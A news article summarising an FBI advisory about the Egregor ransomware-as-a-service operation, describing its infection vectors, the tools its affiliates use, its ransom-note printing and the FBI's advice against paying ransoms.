The FBI has alerted US companies in the private sector to msny attacks using the Egregor ransomware. The malware currently is attacking businesses worldwide & has already compromised over 150 organisations.
The agency stated the malware has already compromised more than 150 organisations & provided more insight into its ransomware-as-a-service behaviour.
They issued an advisory (PDF) that also shed new light & identifies the innerworkings of the prolific malware, which has already been seen wreaking indiscriminate havoc against various types of organisations.
Egregor — the name of which refers to an occult term meant to signify the collective energy or force of a group of individuals–is indeed the work of a “large number of actors” & is operating as a ransomware-as-a-service model, according to the FBI.
“Because of the large number of actors involved in deploying Egregor, the tactics, techniques & procedures (TTPs) used in its deployment can vary widely, creating significant challenges for defence & mitigation,” explained the FBI.
The FBI observed the ”number of ways” Egregor compromises business networks, “including targeting…employee personal accounts that share access with business networks or devices.”
It also spreads via phishing emails with malicious attachments or exploits for remote desktop protocol (RDP) or VPNs, the agency said.
When access is gained, threat players can move laterally inside networks. Egregor ransomware affiliates have been seen using common pen-testing & exploit tools like Cobalt Strike, Qakbot/Qbot, Advanced IP Scanner & AdFind to escalate privileges & make lateral moves across a network, also tools like Rclone — sometimes renamed or hidden as “svchost” & 7zip to exfiltrate data, according to the FBI.
Corroborating what security researchers already have observed, the FBI revealed it 1st identified Egregor in Sept. & noted that since then, the threat players behind the malware have worked quickly.
The document also describes what the typical modus operandi of Egregor looks like to victims, behaviour also already observed in known & publicised attacks. In addition to engaging in typical ransomware behaviours, such as exfiltrating & encrypting files on the network as well as leaving a ransom note on machines to instruct victims how to communicate with threat players via an online chat, Egregor also has a unique feature, the FBI observed.
“Egregor actors often utilise the print function on victim machines to print ransom notes,” the agency wrote in the document.
Indeed, the group at this time the only known ransomware to run scripts that cause printers at the organisation to continuously print out the ransom note, a behaviour captured on video & posted to Twitter during an attack on S. American retailer Cencosud in mid-Nov.
Will Not Pay
If victims refuse to pay, Egregor publishes victim data to a “public site,” the FBI noted.
However, the agency—like many security experts–encourages organisations not to pay the ransom, as it “emboldens adversaries to target additional organisations, encourages other criminal actors to engage in the distribution of ransomware, and/or may fund illicit activities,” the agency explained.
Paying the ransom also does not guarantee that a victim’s files will be recovered, another well-known outcome of ransomware attacks, the FBI commented.
“However, the FBI understands that when businesses are faced with an inability to function, executives will evaluate all options to protect their shareholders, employees & customers,” the agency suggested, encouraging organisations to report ransomware incidents to their local FBI field offices whether they decide to pay the ransom or not.